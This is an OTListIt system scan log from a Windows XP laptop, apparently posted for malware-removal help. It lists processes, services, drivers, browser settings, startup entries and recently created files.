PRC - C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation)
PRC - C:\WINDOWS\system32\dumprep.exe (Microsoft Corporation)
PRC - C:\Documents and Settings\John B\Desktop\OTListIt2.exe (OldTimer Tools)

========== Win32 Services (SafeList) ==========

SRV - (ACDaemon [Auto | Running]) -- C:\Program Files\Common Files\ArcSoft\Connection Service\Bin\ACService.exe (ArcSoft Inc.)
SRV - (aspnet_state [On_Demand | Stopped]) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe (Microsoft Corporation)
SRV - (aswUpdSv [Auto | Running]) -- C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe (ALWIL Software)
SRV - (avast! Antivirus [Auto | Running]) -- C:\Program Files\Alwil Software\Avast4\ashServ.exe (ALWIL Software)
SRV - (avast! Mail Scanner [On_Demand | Running]) -- C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe (ALWIL Software)
SRV - (avast! Web Scanner [On_Demand | Running]) -- C:\Program Files\Alwil Software\Avast4\ashWebSv.exe (ALWIL Software)
SRV - (C-DillaCdaC11BA [Auto | Running]) -- C:\WINDOWS\system32\drivers\CDAC11BA.EXE (C-Dilla Ltd)
SRV - (CCALib8 [Auto | Running]) -- C:\Program Files\Canon\CAL\CALMAIN.exe (Canon Inc.)
SRV - (CFSvcs [Auto | Running]) -- C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe (TOSHIBA CORPORATION)
SRV - (clr_optimization_v2.0.50727_32 [On_Demand | Stopped]) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe (Microsoft Corporation)
SRV - (DVD-RAM_Service [Auto | Running]) -- C:\WINDOWS\System32\DVDRAMSV.exe (Matsushita Electric Industrial Co., Ltd.)
SRV - (gupdate1c9a0d0dfd66502 [Auto | Stopped]) -- C:\Program Files\Google\Update\GoogleUpdate.exe (Google Inc.)
SRV - (helpsvc [Auto | Running]) -- C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll (Microsoft Corporation)
SRV - (IDriverT [On_Demand | Stopped]) -- C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe (Macrovision Corporation)
SRV - (JavaQuickStarterService [Auto | Running]) -- C:\Program Files\Java\jre6\bin\jqs.exe (Sun Microsystems, Inc.)
SRV - (MDM [Auto | Running]) -- C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe (Microsoft Corporation)
SRV - (MSCSPTISRV [On_Demand | Stopped]) -- C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe (Sony Corporation)
SRV - (ose [On_Demand | Stopped]) -- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE (Microsoft Corporation)
SRV - (PACSPTISVR [On_Demand | Stopped]) -- C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe ()
SRV - (Pml Driver HPH11 [On_Demand | Stopped]) -- C:\WINDOWS\system32\HPHipm11.exe (HP)
SRV - (Pml Driver HPZ12 [Unknown | Running]) -- C:\WINDOWS\system32\HPZipm12.exe (HP)
SRV - (rpcapd [On_Demand | Stopped]) -- C:\Program Files\WinPcap\rpcapd.exe (CACE Technologies)
SRV - (SonicStage Back-End Service [On_Demand | Stopped]) -- C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe (Sony Corporation)
SRV - (SoundMAX Agent Service (default) [Auto | Running]) -- C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe (Analog Devices, Inc.)
SRV - (SPTISRV [On_Demand | Stopped]) -- C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe (Sony Corporation)
SRV - (SSScsiSV [On_Demand | Stopped]) -- C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe (Sony Corporation)
SRV - (usnjsvc [On_Demand | Stopped]) -- C:\Program Files\MSN Messenger\usnsvc.exe (Microsoft Corporation)
SRV - (WMPNetworkSvc [On_Demand | Stopped]) -- C:\Program Files\Windows Media Player\WMPNetwk.exe (Microsoft Corporation)

========== Driver Services (SafeList) ==========

DRV - (Aavmker4 [System | Running]) -- C:\WINDOWS\System32\drivers\aavmker4.sys (ALWIL Software)
DRV - (aeaudio [On_Demand | Running]) -- C:\WINDOWS\system32\drivers\aeaudio.sys (Andrea Electronics Corporation)
DRV - (AegisP [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\AegisP.sys (Cisco Systems, Inc.)
DRV - (Afc [On_Demand | Running]) -- C:\WINDOWS\system32\drivers\Afc.sys (Arcsoft, Inc.)
DRV - (AFS2K [System | Running]) -- C:\WINDOWS\System32\drivers\AFS2K.SYS (Oak Technology Inc.)
DRV - (AgereSoftModem [On_Demand | Running]) -- C:\WINDOWS\System32\DRIVERS\AGRSM.sys (Agere Systems)
DRV - (ApfiltrService [On_Demand | Running]) -- C:\WINDOWS\System32\DRIVERS\Apfiltr.sys (Alps Electric Co., Ltd.)
DRV - (APL531 [On_Demand | Stopped]) -- C:\WINDOWS\System32\Drivers\ov550i.sys (Omnivision Technologies, Inc.)
DRV - (aswFsBlk [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\aswFsBlk.sys (ALWIL Software)
DRV - (aswMon2 [Auto | Running]) -- C:\WINDOWS\System32\drivers\aswmon2.sys (ALWIL Software)
DRV - (aswRdr [On_Demand | Running]) -- C:\WINDOWS\System32\drivers\aswRdr.sys (ALWIL Software)
DRV - (aswSP [System | Running]) -- C:\WINDOWS\System32\drivers\aswSP.sys (ALWIL Software)
DRV - (aswTdi [System | Running]) -- C:\WINDOWS\System32\drivers\aswTdi.sys (ALWIL Software)
DRV - (atksgt [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\atksgt.sys ()
DRV - (BsStor [Boot | Running]) -- C:\WINDOWS\System32\drivers\BsStor.sys (B.H.A Co.,Ltd.)
DRV - (BsUDF [Disabled | Running]) -- C:\WINDOWS\System32\drivers\BsUDF.sys (B.H.A Co.,Ltd.)
DRV - (CdaC15BA [Auto | Running]) -- C:\WINDOWS\system32\drivers\CDAC15BA.SYS ()
DRV - (Dot4 HPH11 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\hphid411.sys (HP)
DRV - (Dot4Print HPH11 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\hphipr11.sys (HP)
DRV - (Dot4Usb HPH11 [On_Demand | Stopped]) -- C:\WINDOWS\System32\drivers\hphius11.sys (HP)
DRV - (E100B [On_Demand | Running]) -- C:\WINDOWS\System32\DRIVERS\e100b325.sys (Intel Corporation)
DRV - (EAPPkt [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\EAPPkt.sys (Realtek)
DRV - (FTDIBUS [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\ftdibus.sys (FTDI Ltd.)
DRV - (giveio [Disabled | Stopped]) -- C:\WINDOWS\system32\giveio.sys ()
DRV - (grmnusb [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\grmnusb.sys (GARMIN Corp.)
DRV - (GWIOPM [On_Demand | Stopped]) -- c:\Program Files\LEA Digital Recorder\gwiopm.sys ()
DRV - (HPZid412 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\HPZid412.sys (HP)
DRV - (HPZipr12 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\HPZipr12.sys (HP)
DRV - (HPZius12 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\HPZius12.sys (HP)
DRV - (ialm [On_Demand | Running]) -- C:\WINDOWS\System32\DRIVERS\ialmnt5.sys (Intel Corporation)
DRV - (lirsgt [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\lirsgt.sys ()
DRV - (MASPINT [Auto | Running]) -- C:\WINDOWS\System32\drivers\MASPINT.SYS (MicroStaff Co.,Ltd.)
DRV - (MDC8021X [Auto | Running]) -- C:\WINDOWS\system32\DRIVERS\mdc8021x.sys (Meetinghouse Data Communications)
DRV - (meiudf [System | Running]) -- C:\WINDOWS\System32\Drivers\meiudf.sys (Matsushita Electric Industrial Co.,Ltd.)
DRV - (Netdevio [Auto | Running]) -- C:\WINDOWS\System32\DRIVERS\netdevio.sys (TOSHIBA Corporation.)
DRV - (NETGEAR_MA111 [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\MA111nd5.sys ( )
DRV - (NPF [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\npf.sys (CACE Technologies)
DRV - (pciSd [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\tossdpci.sys (TOSHIBA)
DRV - (pfc [On_Demand | Running]) -- C:\WINDOWS\system32\drivers\pfc.sys (Padus, Inc.)
DRV - (PRISM_A02 [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\PRISMAXP.sys (GlobespanVirata, Inc.)
DRV - (Ptilink [On_Demand | Running]) -- C:\WINDOWS\System32\DRIVERS\ptilink.sys (Parallel Technologies, Inc.)
DRV - (PxHelp20 [Boot | Running]) -- C:\WINDOWS\System32\DRIVERS\PxHelp20.sys (Sonic Solutions)
DRV - (rt2870 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\rt2870.sys (Ralink Technology, Corp.)
DRV - (Secdrv [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\secdrv.sys (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.)
DRV - (sfdrv01 [Boot | Running]) -- C:\WINDOWS\System32\drivers\sfdrv01.sys (Protection Technology)
DRV - (sfhlp02 [Boot | Running]) -- C:\WINDOWS\System32\drivers\sfhlp02.sys (Protection Technology)
DRV - (smwdm [On_Demand | Running]) -- C:\WINDOWS\system32\drivers\smwdm.sys (Analog Devices, Inc.)
DRV - (sonypvs1 [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\sonypvs1.sys (Sony Corporation)
DRV - (speedfan [Boot | Running]) -- C:\WINDOWS\system32\speedfan.sys (Windows ® 2000 DDK provider)
DRV - (SUSTUCAM [On_Demand | Stopped]) -- C:\WINDOWS\system32\DRIVERS\sustucam.sys (Susteen, Inc.)
DRV - (TBiosDrv [Auto | Running]) -- C:\WINDOWS\System32\drivers\TBiosDrv.sys ()
DRV - (tmcomm [Auto | Running]) -- C:\WINDOWS\system32\drivers\tmcomm.sys (Trend Micro Inc.)
DRV - (tossmbnt [Auto | Running]) -- C:\WINDOWS\System32\drivers\TOSSMBNT.sys ()
DRV - (tsdhd [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\tsdhd.sys (TOSHIBA Corporation)
DRV - (TVALZ [Boot | Running]) -- C:\WINDOWS\System32\DRIVERS\TVALZ.SYS (TOSHIBA Corporation)
DRV - (usbaudio [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\usbaudio.sys (Microsoft Corporation)
DRV - (WlanUIB [On_Demand | Stopped]) -- C:\WINDOWS\System32\DRIVERS\MA111nd5.sys ( )
DRV - ({6080A529-897E-4629-A488-ABA0C29B635E} [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\ialmsbw.sys (Intel Corporation)
DRV - ({D31A0762-0CEB-444e-ACFF-B049A1F6FE91} [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\ialmkchw.sys (Intel Corporation)
DRV - ({E2B953A6-195A-44F9-9BA3-3D5F4E32BB55} [On_Demand | Stopped]) -- C:\WINDOWS\system32\drivers\wA301a.sys (Intel Corporation)

========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft....k/?LinkId=69157
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft....k/?LinkId=54896
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\windows\system32\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft....k/?LinkId=54896
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://ie.search.msn...st/srchcust.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.microsoft...amp;ar=iesearch
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://ie.search.msn...st/srchasst.htm

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.microsoft...amp;ar=iesearch
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\windows\system32\blank.htm
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft...amp;ar=iesearch
IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft...p...&ar=msnhome
IE - URLSearchHook: {EF99BD32-C1FB-11D2-892F-0090271D4F88} - Reg Error: Key error. File not found
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>

========== FireFox ==========

FF - prefs.js..browser.startup.homepage: "www.yahoo.com"
FF - prefs.js..extensions.enabledItems: {DCBD1271-D228-4082-9FBC-36D9B7660B03}:1.1.8
FF - prefs.js..extensions.enabledItems: [email protected]:0.8.1
FF - prefs.js..extensions.enabledItems: {DDC359D1-844A-42a7-9AA1-88A850A938A8}:1.1.3
FF - prefs.js..extensions.enabledItems: {fffe0eac-3819-4561-8aa9-178a68450d4f}:1.9
FF - prefs.js..extensions.enabledItems: {CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}:6.0.14
FF - prefs.js..extensions.enabledItems: [email protected]:1.0
FF - prefs.js..extensions.enabledItems: [email protected]:1.1.1
FF - prefs.js..extensions.enabledItems: {5872365e-67d1-4afd-9480-fd293bebd20d}:1.7.2
FF - prefs.js..extensions.enabledItems: {e968fc70-8f95-4ab9-9e79-304de2a71ee1}:0.7
FF - prefs.js..extensions.enabledItems: {972ce4c6-7e08-4474-a285-3208198ce6fd}:3.0.11
FF - prefs.js..extensions.foxtor.browser.search.update: true

FF - HKLM\software\mozilla\Firefox\Extensions\\[email protected]: C:\PROGRAM FILES\JAVA\JRE6\LIB\DEPLOY\JQS\FF [2009/06/24 15:58:58 | 00,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.0.11\extensions\\Components: C:\PROGRAM FILES\MOZILLA FIREFOX\COMPONENTS [2009/06/16 09:03:43 | 00,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Firefox 3.0.11\extensions\\Plugins: C:\PROGRAM FILES\MOZILLA FIREFOX\PLUGINS [2009/06/24 15:59:23 | 00,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Thunderbird 2.0.0.21\extensions\\Components: C:\PROGRAM FILES\MOZILLA THUNDERBIRD\COMPONENTS [2009/04/01 14:12:30 | 00,000,000 | ---D | M]
FF - HKLM\software\mozilla\Mozilla Thunderbird 2.0.0.21\extensions\\Plugins: C:\PROGRAM FILES\MOZILLA THUNDERBIRD\PLUGINS [2009/03/03 11:10:06 | 00,000,000 | ---D | M]

[2009/01/10 15:56:45 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Extensions
[2009/01/10 15:56:45 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}
[2009/07/08 15:00:18 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions
[2008/02/10 10:04:28 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{5872365e-67d1-4afd-9480-fd293bebd20d}
[2008/12/03 00:29:03 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{DCBD1271-D228-4082-9FBC-36D9B7660B03}
[2009/05/12 14:13:43 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}
[2009/06/29 15:57:55 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{e968fc70-8f95-4ab9-9e79-304de2a71ee1}
[2009/03/20 13:42:00 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\{fffe0eac-3819-4561-8aa9-178a68450d4f}
[2009/06/29 15:57:55 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\[email protected]
[2008/09/10 22:44:32 | 00,000,000 | ---D | M] -- C:\Documents and Settings\John B\Application Data\mozilla\Firefox\Profiles\ghtrl0km.default\extensions\[email protected]
[2009/07/08 14:47:07 | 00,000,000 | ---D | M] -- C:\Program Files\mozilla firefox\extensions
[2009/06/16 09:03:43 | 00,000,000 | ---D | M] -- C:\Program Files\mozilla firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2009/06/24 15:59:28 | 00,000,000 | ---D | M] -- C:\Program Files\mozilla firefox\extensions\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}
[2007/06/10 23:13:05 | 00,000,000 | ---D | M] -- C:\Program Files\mozilla firefox\extensions\talkback@mozilla(2).org
[2009/06/16 09:03:33 | 00,023,032 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browserdirprovider.dll
[2009/06/16 09:03:34 | 00,134,648 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\brwsrcmp.dll
[2009/01/10 15:56:18 | 00,001,394 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\amazondotcom.xml
[2009/01/10 15:56:18 | 00,002,193 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\answers.xml
[2009/01/10 15:56:18 | 00,001,534 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\creativecommons.xml
[2009/01/10 15:56:18 | 00,002,343 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\eBay.xml
[2009/01/10 15:56:18 | 00,001,706 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\google.xml
[2009/01/10 15:56:18 | 00,001,178 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia.xml

O1 HOSTS File: (0 bytes) - C:\WINDOWS\System32\drivers\etc\Hosts
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
O2 - BHO: (JQSIEStartDetectorImpl Class) - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll (Sun Microsystems, Inc.)
O4 - HKLM..\Run: [AGRSMMSG] AGRSMMSG.exe (Agere Systems)
O4 - HKLM..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe (ALWIL Software)
O4 - HKLM..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe" (Sun Microsystems, Inc.)
O4 - HKLM..\Run: [TFNF5] TFNF5.exe (TOSHIBA Corp.)
O4 - HKLM..\Run: [TPSMain] TPSMain.exe (TOSHIBA Corporation)
O4 - HKCU..\Run: [Trackstick Manager.exe] "C:\Program Files\Trackstick Manager\Trackstick Manager.EXE" -min (Telespial Systems)
O4 - HKCU..\Run: [updateMgr] "C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_9 -reboot 1 (Adobe Systems Incorporated)
O4 - HKLM..\RunOnce: [InnoSetupRegFile.0000000001] "C:\WINDOWS\is-26UPH.exe" /REG ()
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\00THotkey.exe (TOSHIBA Corp.)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Belkin N Wireless USB Adapter Client Utility.lnk = C:\Program Files\Belkin\F5D8053\v5\Belkinwcui.exe (Belkin)
O4 - Startup: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\RAMASST.lnk = C:\WINDOWS\system32\RAMASST.exe (Matsushita Electric Industrial Co., Ltd.)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoCDBurning = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: HonorAutoRunSetting = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: dontdisplaylastusername = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: legalnoticecaption =
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: legalnoticetext =
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: shutdownwithoutlogon = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: undockwithoutlogon = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableRegistryTools = 0
O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveTypeAutoRun = 323
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDriveAutoRun = 67108863
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0
O7 - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableProfileQuota = 1
O9 - Extra Button: PokerStars - {3AD14F0C-ED16-4e43-B6D8-661B03F6A1EF} - C:\Program Files\PokerStars\PokerStarsUpdate.exe (PokerStars)
O9 - Extra 'Tools' menuitem : Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - C:\WINDOWS\bdoscandel.exe ()
O9 - Extra 'Tools' menuitem : @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe (Microsoft Corporation)
O9 - Extra Button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe (Microsoft Corporation)
O9 - Extra 'Tools' menuitem : Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe (Microsoft Corporation)
O15 - HKLM\..Trusted Domains: 1 domain(s) and sub-domain(s) not assigned to a zone.
O15 - HKCU\..Trusted Domains: ([]msn in My Computer)
O15 - HKCU\..Trusted Domains: aol.com ([free] http in Trusted sites)
O15 - HKCU\..Trusted Domains: 28 domain(s) and sub-domain(s) not assigned to a zone.
O16 - DPF: {05CA9FB0-3E3E-4B36-BF41-0E3A5CAA8CD8} http://go.microsoft....k/?linkid=58813 (Office Genuine Advantage Validation Tool)
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} http://www.ipix.com/viewers/ipixx.cab (iPIX ActiveX Control)
O16 - DPF: {149E45D8-163E-4189-86FC-45022AB2B6C9} (SpinTop DRM Control)
O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} http://housecall65.t...ivex/hcImpl.cab (Trend Micro ActiveX Scan Agent 6.6)
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} C:\Program Files\Yahoo!\Common\yinsthelper.dll (YInstStarter Class)
O16 - DPF: {341FF14B-00CB-49F5-A427-A164DF1D5E1F} http://musicstore.co...ALStreaming.cab (MALPlaybackCtrl Class)
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (Reg Error: Key error.)
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} http://download.bitd...can8/oscan8.cab (BDSCANONLINE Control)
O16 - DPF: {7D731A83-6C80-4EA4-9646-5E06A0513274} http://www.shockwave...gwebinstall.cab (Sandlot Loader Control)
O16 - DPF: {7E980B9B-8AE5-466A-B6D6-DA8CF814E78A} http://www.shockwave...mjolauncher.cab (MJLauncherCtrl Class)
O16 - DPF: {87056D28-9730-4A47-B9F9-7E890B62C58A} http://www.shockwave...bugs/axhost.cab (WildfireActiveXHost Class)
O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_14)
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} http://acs.pandasoft...free/asinst.cab (ActiveScan Installer Class)
O16 - DPF: {9F1C11AA-197B-4942-BA54-47A8489BB47F} http://v4.windowsupd...8135.7490393519 (Reg Error: Key error.)
O16 - DPF: {B1826A9F-4AA0-4510-BA77-9013E74E4B9B} http://www.trendmicr...scan/as4web.cab (Reg Error: Key error.)
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} http://download.mcaf...,20/mcgdmgr.cab (Reg Error: Key error.)
O16 - DPF: {C7DB51B4-BCF7-4923-8874-7F1A0DC92277} http://office.micros...ntent/opuc4.cab (Office Update Installation Engine)
O16 - DPF: {CAFEEFAC-0014-0002-0016-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.4.2_16)
O16 - DPF: {CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_14)
O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Java Plug-in 1.6.0_14)
O16 - DPF: {CC450D71-CC90-424C-8638-1F2DBAC87A54} (ArmHelper Control)
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload.ma...ash/swflash.cab (Shockwave Flash Object)
O16 - DPF: {D77EF652-9A6B-40C8-A4B9-1C0697C6CF41} http://download.game...inematycoon.cab (TikGames Online Control)
O18 - Protocol\Handler\cdo {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL (Microsoft Corporation)
O18 - Protocol\Handler\http\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\http\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\https\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\https\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\ipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\livecall {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\MSN Messenger\msgrapp.8.1.0178.00.dll (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files\Common Files\SYSTEM\Ole DB\msdaipp.dll (Microsoft Corporation)
O18 - Protocol\Handler\ms-itss {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll (Microsoft Corporation)
O18 - Protocol\Handler\msnim {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\MSN Messenger\msgrapp.8.1.0178.00.dll (Microsoft Corporation)
O18 - Protocol\Filter: - text/xml - C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSOXMLMF.DLL (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (Explorer.exe) - C:\WINDOWS\Explorer.exe (Microsoft Corporation)
O20 - Winlogon\Notify\igfxcui: DllName - igfxdev.dll - C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck) - File not found
O34 - HKLM BootExecute: (autochk) - C:\WINDOWS\System32\autochk.exe (Microsoft Corporation)
O34 - HKLM BootExecute: (*) - File not found

========== Files/Folders - Created Within 30 Days ==========

[2009/07/08 14:38:48 | 00,673,280 | ---- | C] () -- C:\WINDOWS\is-26UPH.exe
[2009/07/08 14:38:48 | 00,010,468 | ---- | C] () -- C:\WINDOWS\is-26UPH.msg
